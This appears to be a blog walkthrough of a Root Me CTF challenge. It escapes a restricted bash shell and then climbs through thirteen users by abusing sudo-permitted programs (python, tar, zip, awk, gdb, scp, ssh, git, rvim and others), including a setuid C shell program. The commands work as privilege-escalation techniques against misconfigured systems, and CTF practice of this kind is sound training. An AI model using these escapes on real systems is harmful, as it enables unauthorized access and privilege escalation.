I'm considering seriously the CTF topic, it is so funny but I need to learn more and more.
A good choice to start learning is
Root Me allows us to practice with a lot of challenges, classified in arguments: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.
Let's start with the first category: App - Script.
The seventh challenge that we face is: Restricted shells
Vulnerability type:
- Privilege Escalation by Sudo weak configuration and the SETUID
##################################################
On the web page of the challenge, click on "Start the challenge" and connect to it by typing:
- ssh -p 2222 app-script-ch14@challenge02.root-me.org
The password to connect is "app-script-ch14".
At the beginning, look the hint of the screen about the usage of sudo -l. This command could be useful in future.
We can quickly understand that a lot of commands cannot be used and the .passwd file can be accessed only by app-script-ch14-14 user. This occurs because the current shell is based on rbash (restricted bash) that restricts a lot of commands. Usually, when administrators use rbash to restrict the actions of standard users, they put the available commands inside the $HOME directory.
In this scenario, since I cannot use ANYTHING, the first step is to invoke a BASH SHELL (and damn to hell rbash). How can we do this?
After having spent 100 years of our life, we noted that we can use echo command that can be used like ls to see which files we have in a directory.
Typing:
we get the files inside the home directory. By typing again echo to see the content of these three directories, we see that the app-script-ch14-sudoers and step14 directories don't show any result, maybe because I don't have right privileges to access to them. But if we type:
we see one file, vim.
Vim can be used to execute linux commands. Type:
then, in the vim environment, type:
- :set shell=/bin/bash
- :shell
At this point, we execute the BASH SHELL and GOODBYE RBASH!!!!!!!!
The challenge is ended. The flag is Th3Ch4ll3ng31sN0t3nD3d.
Of course the challenge is not ended.
Let's resume: I'm app-script-ch14, I'm on bash NOW and the challenge is not ended. Ok.
At least now I should have available a lot of commands.
If I try to type a command I get an error because ... (read the error). So you should invoke the command by using the absolute path, for example /bin/ls for ls command.
I need to have the privilege of app-script-ch14-14 user so I use the following command to see if I can perform some action as app-script-ch14-14:
I get:
Matching Defaults entries for app-script-ch14 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14 may run the following commands on challenge02:
(app-script-ch14-2) NOPASSWD: /usr/bin/python
It means that I can run python as app-script-ch14-2 user by using my current user. Let's do this. To execute the command as app-script-ch14-2 user, type:
- /usr/bin/sudo -u app-script-ch14-2 /usr/bin/python
In this way we are executing Python interpreter as the app-script-ch14-2 user. By Python code, we can execute Linux commands to start another shell, of course as app-script-ch14-2 user. In the Python interpreter, just type:
- >>> import os
- >>> os.system("/bin/bash")
A new shell with our new user is opened. Now we must do the same actions until we reach the app-script-ch14-14 user.
So, typing sudo -l we get:
Matching Defaults entries for app-script-ch14-2 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-2 may run the following commands on challenge02:
(app-script-ch14-3) NOPASSWD: /bin/tar
Type:
- sudo -u app-script-ch14-3 /bin/tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
and we get a shell as app-script-ch14-3 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-3 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-3 may run the following commands on challenge02:
(app-script-ch14-4) NOPASSWD: /usr/bin/zip
Type:
- sudo -u app-script-ch14-4 /usr/bin/zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
and we get a shell as app-script-ch14-4 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-4 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-4 may run the following commands on challenge02:
(app-script-ch14-5) NOPASSWD: /usr/bin/awk
Type:
- sudo -u app-script-ch14-5 /usr/bin/awk 'BEGIN {system("/bin/bash")}'
and we get a shell as app-script-ch14-5 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-5 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-5 may run the following commands on challenge02:
(app-script-ch14-6) NOPASSWD: /usr/bin/gdb
Type:
- sudo -u app-script-ch14-6 /usr/bin/gdb
- (gdb) python import os; os.system('/bin/bash')
and we get a shell as app-script-ch14-6 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-6 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch14-6 may run the following commands on challenge02:
(app-script-ch14-7) NOPASSWD: /usr/bin/pico
Type:
- sudo -u app-script-ch14-7 /usr/bin/pico -s "/bin/bash"
Then a text editor appears. Just write /bin/bash and press CTRL+T.
We get a shell as app-script-ch14-7 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-7 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-7 may run the following commands on challenge02:
(app-script-ch14-8) NOPASSWD: /usr/bin/scp
Here it does not allow me to execute directly the commands, so I should make a script (that is called as app-script-ch14-8 user) that compile a C program that performs a /bin/bash and then set the C executable program with set SETUID. In this way, when the current user will execute this program, it execute it as app-script-ch14-8 user.
For first make a directory in /tmp folder and make these script and program there.
Type:
- mkdir /tmp/shell
- cd /tmp/shell
- chmod 777 .
Inside this folder, make the following C program that we call shell.c:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
setresgid(getegid(), getegid(), getegid());
setresuid(geteuid(), geteuid(), geteuid());
execve("/bin/bash", argv, envp);
return 0;
}
Then make the following script that we call run.sh:
#!/bin/bash
gcc shell.c -o shell
chmod 777 shell
chmod +s shell
Then, by remaining in the /tmp/shell folder, execute:
- chmod 777 run.sh
- sudo -u app-script-ch14-8 /usr/bin/scp -S ./run.sh 127.0.0.1:/tmp/z.zip ./
The run.sh script will be executed and the shell program (with app-script-ch14-8 ownership) will be generated with SETUID enabled so we can execute this program with the privilege of the owner.
Type:
and we get a shell as app-script-ch14-8 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-8 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-8 may run the following commands on challenge02:
(app-script-ch14-9) NOPASSWD: /usr/bin/man
Type:
- sudo -u app-script-ch14-9 /usr/bin/man ls
- !/bin/bash
and we get a shell as app-script-ch14-9 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-9 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-9 may run the following commands on challenge02:
(app-script-ch14-10) NOPASSWD: /usr/bin/ssh
Type:
- sudo -u app-script-ch14-10 /usr/bin/ssh -o ProxyCommand="sh -c './run.sh'" 127.0.0.1
In this way, I execute the run.sh script BEFORE the instantiation of the connection. In this case we will get an error:
Could not create directory '/challenge/app-script/ch14/.ssh'.
ssh_exchange_identification: Connection closed by remote host
but don't worry, because our script has been executed before. Our script generates again an executable program with SETUID enabled that we can run with the same privilege of the owner (that is app-script-ch14-10). So, type:
and we get a shell as app-script-ch14-10 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-10 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-10 may run the following commands on challenge02:
(app-script-ch14-11) NOPASSWD: /usr/bin/git
Type:
- sudo -u app-script-ch14-11 /usr/bin/git help status
- !/bin/bash
and we get a shell as app-script-ch14-11 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-11 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-11 may run the following commands on challenge02:
(app-script-ch14-12) NOPASSWD: /usr/bin/rvim
In this case we have again vim but it is restricted, I cannot use :set shell=/bin/bash and :shell commands.
In our help PYTHON (ofc) comes! We can use Python to execute Linux commands. Type:
- sudo -u app-script-ch14-12 /usr/bin/rvim
- :python import os; os.system('gcc shell.c -o shell && chmod 777 shell && chmod +s shell')
- :q (or :q!)
- ./shell
In vim you can also use :python import os; os.system('/bin/bash').
Anyway, we get a shell as app-script-ch14-12 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-12 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-12 may run the following commands on challenge02:
(app-script-ch14-13) NOPASSWD: /usr/bin/script
Type:
- sudo -u app-script-ch14-13 /usr/bin/script
and we get a shell as app-script-ch14-13 user.
Again, type sudo -l and we get:
Matching Defaults entries for app-script-ch14-13 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
!mail_no_user
User app-script-ch14-13 may run the following commands on challenge02:
(app-script-ch14-14) NOPASSWD: /bin/rbash --
Type:
- sudo -u app-script-ch14-14 /bin/rbash --
and we get a shell as app-script-ch14-14 user.
NOW I AM the user app-script-ch14-14 as I have desired! THIS SUPER PRIVILEGE ESCALATION!
Note that now we are on the ~/step14 folder. But we have one problem... Did you see? For getting the SOUL of the app-script-ch14-14 user, we have performed the rbash command, so we have again a restricted shell. This time I don't have vim.
Our target is to read the .passwd file that we have in the $HOME folder. I cannot use ls command but like before, I can use echo ./* command to see which files I have in my current directory. Inside the step14 folder I see one file, ./sl. I cannot execute it. I cannot move away from this current folder...
At this point how can we read a file?
We can use different ways, here I show you two ways:
The 1° one by using mapfile. It allows to read any file in an environment variable. Type:
- mapfile ARRAY < ../.passwd ARRAY
- echo $ARRAY
The 2° one by using echo:
You will get THE FLLLLLLAAAAAAGGGGGGGGGGGGGGGGGGGGGGG!
Now I go to ronfronf...
Useful links:
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/